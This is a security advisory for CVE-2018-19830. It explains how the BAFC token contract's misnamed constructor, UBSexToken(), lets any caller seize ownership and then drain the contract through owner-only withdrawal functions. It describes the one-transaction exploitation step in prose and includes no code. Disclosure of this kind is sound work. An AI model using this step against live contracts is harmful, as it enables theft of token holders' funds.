CVE-2018-19830

Vulnerability

The BAFC (Business Alliance Financial Circle) ERC-20 token smart contract incorrectly declares its constructor as function UBSexToken() instead of using the solidity constructor keyword or matching the contract name. This makes UBSexToken() a public function that can be called by anyone at any time (not only during deployment). The function sets owner = msg.sender without any access control, effectively allowing any caller to overwrite the contract owner. This vulnerability affects the original BAFC token contract as described in reference [1].

Exploitation

An attacker needs only to interact with the deployed BAFC contract on Ethereum and call the UBSexToken() function. No special privileges, authentication, or prior access are required. The function is public and lacks the onlyOwner modifier, so the attacker simply sends a transaction invoking UBSexToken() to become the new owner of the contract [1].

Impact

Once an attacker gains ownership by calling UBSexToken(), they can call any protected functions that rely on the onlyOwner modifier, such as withdraw() or withdrawForeignTokens(). This enables the attacker to transfer all Ether and other ERC-20 tokens held by the contract to their own address, resulting in complete theft of contract funds and a loss of control for the legitimate owners [1].

Mitigation

No patched version has been disclosed in the available references. The underlying issue is a flawed constructor pattern; developers should use the recommended constructor keyword in Solidity (or a function that matches the contract name and is called only once during deployment). Since the contract is deployed and immutable on the blockchain, the only mitigation is for token holders to avoid or migrate away from the vulnerable BAFC contract. The CVE is not listed in CISA's Known Exploited Vulnerabilities (KEV) catalog as of the publication date [1].